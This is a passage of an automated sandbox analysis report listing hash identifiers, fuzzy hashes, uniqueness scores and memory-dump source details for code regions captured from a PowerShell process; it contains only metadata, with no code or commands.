                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c05c2c129c612c1a8ff58e5026468ca853e39f02bee2a848704ebd0c16d9df2c
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5BB14A74A12605DFCB08CF68D590A9DB7F2FF88314B6286A5E4059F3A5DB70ED42CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6b6611e6ccac861f407317c2de6f7d06cfe148949b416644114831f5a1bf20b0
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9a53b96cb2c2adf32238b1105ebfe9ced6700a0e41227e4950e5ae2379b933fa
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b6611e6ccac861f407317c2de6f7d06cfe148949b416644114831f5a1bf20b0
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6A19E31E006199FDB20DF64C884B9AB7B2FFC9304F118595E909AB314DBB4AE85CF91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: de0be90a3f45bde2d292788df058c77f15789de040f17b208dcd0b8a662bc6dc
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: dc1cea5961b016534a5e07bc2ad3d807f9c5f102f6df4a9e2826a7345c2d2ec3
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de0be90a3f45bde2d292788df058c77f15789de040f17b208dcd0b8a662bc6dc
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F691CE31B042089FDB19DF74D864AAEB7F7AF88640F158069E506EB3A4DF719C01CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 56ec8407c72b3c925373932d4e5d53111da9331008d9244fe2bb60ac66b12194
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0d8d9b8e5ce134c24f6ffc8685887c6b5133bb02c900ef0d760d23ab810e4661
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56ec8407c72b3c925373932d4e5d53111da9331008d9244fe2bb60ac66b12194
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9091DF31604A01DFDB269F61E8287AA7BF6FF88345F044428E50B9B3A5DF79AC05CB51
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: dfe261cfe87c188ec6077410cc6d32c425c0ac815952d265f281ce5e507fe40e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 371c0d9151e9de8c239ebda0030ee33f9f0639b36f7cf5182e31990832e79619
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dfe261cfe87c188ec6077410cc6d32c425c0ac815952d265f281ce5e507fe40e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4A15874A00605CFCB64DFA4C48496EB7F2FF88314B2189A9D91A9B754CB35ED4ACF81
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c7bce21dfddf14267f61bbbfbf22385d7090130e032ce1de3911060eb0db6736
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1149209896fa8d20dce8be80b3a5d548f46dc72c7d0b292bdc8c4140a5d64df6
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7bce21dfddf14267f61bbbfbf22385d7090130e032ce1de3911060eb0db6736
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85919F30B00205AFEB14EF64D854AAEB7A3BFC9304F158478D905AB795DF74AD028B91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2fa5f976004f6524b97abd7ea17d5986391d3aca5ac828b8c2fc7f21067d03ad
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 39e2045c6296ba9bb8eed3d81a613ce209c6fa00330d57b6225d87398e5600ea
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fa5f976004f6524b97abd7ea17d5986391d3aca5ac828b8c2fc7f21067d03ad
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E715836B082558FDB159BA8C8509DE77A7EFC4299B11803ADA0ACF354DB31DC06C7E2
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b1d2df4e3ba7d28b3a5e9db2db576f41ff1f07c0a968812b9b8b533ccb00e1d6
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2bb0f660854e182f785577681b1a275c519df27a630e9f646dad9bb6f087421a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1d2df4e3ba7d28b3a5e9db2db576f41ff1f07c0a968812b9b8b533ccb00e1d6
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72819C30600700CFD7659B68C854BAAB7EAFFC4304F14482DD9468BB95CB79EC06DB61
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 998ffefb35415ed20f54c148bc3afdc197a16722ace5d1c0cf8701e815c0c0d4
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5e6cf7125c1d50035986ea70a6cd972c92a3b3fb80fc01300754f17c9bd93827
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 998ffefb35415ed20f54c148bc3afdc197a16722ace5d1c0cf8701e815c0c0d4
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15812934B002049FDB04DF65D894AAEB7F6FF89305F148569E506EB395DB34EC058B90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f0d96cac7077e9970215dd984ae1875c35ddc03a08842d40127b562bcff35f9b
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4f66c401f0792672fb69c24f5b882ddc98f702c0c59b85e62e7226ba3f117437
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0d96cac7077e9970215dd984ae1875c35ddc03a08842d40127b562bcff35f9b
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9811574A04205CFDB15DF69D698A9DBBF1FF8D214B1142A9E806AB3A1DB31ED01CF60
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 95258397336b4d4f6700aa4d3b33242fdd25c0933581d9e194609a82aca85d4e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 471e3c064cdfb1b1e02d9a1b643e389eb69aa28da34328b36dceae80fbb8d665
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95258397336b4d4f6700aa4d3b33242fdd25c0933581d9e194609a82aca85d4e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 965159717042415FEB156774A89477E7BEBEFC6225F098079DE05CB781DE389C068362
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1e0189f0d08468d6f12e6f4512262a2a8e6c6dc8a7b527ca785fdfe12e2a8657
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 31f3567fda645e1162f27141da9044c19d23ac5e511135a295803e14eb3e989e
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e0189f0d08468d6f12e6f4512262a2a8e6c6dc8a7b527ca785fdfe12e2a8657
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A613735A08255CFCB16CF68C494999FFB1EF4A314B1A81DAD849AB752C731EC86CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7fde04fbbd4530d7081ae2fd6b4b6d7f327f3cdd7f96327ccbb88778d7a0a040
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 356addeeec8e83643b487819c29a25bcd7e98a7e9bd41e1596740116bb59ef9a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fde04fbbd4530d7081ae2fd6b4b6d7f327f3cdd7f96327ccbb88778d7a0a040
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F519D306046058FDB14DF34D854AAA7BF6FF89348F018969E906CB7A5DB71ED05CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6e345ea050e1beb440b8b57a4948f3b127d6259e0eb1a07e7e23c91f5e0ebfa6
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8a26b3cabbfac8b641fdfd4b44e0569e090b6e366fc7e67f25a3b2aa42a984dd
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e345ea050e1beb440b8b57a4948f3b127d6259e0eb1a07e7e23c91f5e0ebfa6
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C51AB35B002149FDB19DB79E8546EEB3A6EFC8219F10813ADA06DB750EB31DC02CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a929f0bf8f9e5414a220fb683acb2dd7ba898e1eb3dec9c35c6b982a2444b5fd
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7eb8ffd8cbe8a19accb740ed723e0ebc5330d656cc52fbb4610feb846391ae22
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a929f0bf8f9e5414a220fb683acb2dd7ba898e1eb3dec9c35c6b982a2444b5fd
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F518D74A042158FCB54DF68C9848AEBBF1FF89340B1580AAE909EB361DB31EC05CF60
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b4871bc0b2888ca16d5feeef6fc68573d7cf07384163e9486b4ed66aad683d79
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: bb4979e7ddcc61e2ad4701f941d03f4df8caa530107771842f131f0f44b179bc
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4871bc0b2888ca16d5feeef6fc68573d7cf07384163e9486b4ed66aad683d79
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D141D235B00616ABDF297A28A54427EB2A6ABC430AF154035DC02DBB90EF39CCD5DBD1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: d51e7209dad43a70dff4c14acb05ff6f1cc6727f7f37115960624849d07daa16
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 910ebe8003edf462a81cd4d8ca053487f0a6ff6a5977c141fed5e9d038f5d826
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d51e7209dad43a70dff4c14acb05ff6f1cc6727f7f37115960624849d07daa16
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C51E370B04245AFFB10EBB5E4447EEBBE5AF88309F044429D945A7781DBB5AC84CF61
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e913956d53280f68be83a3fb222a146c8445ebf31288920e4c6cfcadb1707087
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 92d9d4f1c75f7b237820be6f1351d107b772586f6fb51d1fedee245bb1856869
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e913956d53280f68be83a3fb222a146c8445ebf31288920e4c6cfcadb1707087
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4251E134A093998FCB15DB79C090BEEBFF2AF45204F0840AAE895A7792D735DC41CB60
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: aa602dca98ca6da62166b9798a71ba64ea84b1aaa7fba47815e2244e334d1398
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c0db93bcae82277de3f874f9264a72d213df0b61b0a8226c159fba3617cb7458
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa602dca98ca6da62166b9798a71ba64ea84b1aaa7fba47815e2244e334d1398
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C4143317042408FD7A48B2894C4AAABBB3EFC6214B5A44BAD349CB366CB71DC06CB51
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1a5f85dc8a9cba128cbf5bf42ef23d15410d0735df22c31c2f3d0aeb3f137a55
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 93151ea34d56550d6e389ba7237b3fcd3f5910b1934f82eee03a93bc80c4a99a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a5f85dc8a9cba128cbf5bf42ef23d15410d0735df22c31c2f3d0aeb3f137a55
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7417C75F002059FDB18EBA8D8419AEB7F6EFC8204B118929D605AB754DB31ED06CBD1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 61f08dc9360bb815e372255161690a38a3271770b4cb0dffb5ab15c8f988206d
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 82bc36b88cb37c5d4947653da8228bf3f85399c6e399617a2530ff9d0ff90d0f
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61f08dc9360bb815e372255161690a38a3271770b4cb0dffb5ab15c8f988206d
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9513574A042489FCB15CFA8C594AEDBBF2AF89300F158599E806AB3A5D770ED41CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2ec98d49a0818edc04e3a75f729ec1dfcc6316917b4c207e97ca4a1095370948
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d57ac61c6c476aa2980295d7c566cc44bd18cbc69c720003ac8e3c28d89940c0
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ec98d49a0818edc04e3a75f729ec1dfcc6316917b4c207e97ca4a1095370948
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE51A134A093999FCB15DB79C090BEEBFF2AF45204F0844AAE495A7792D735DC41CB60
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

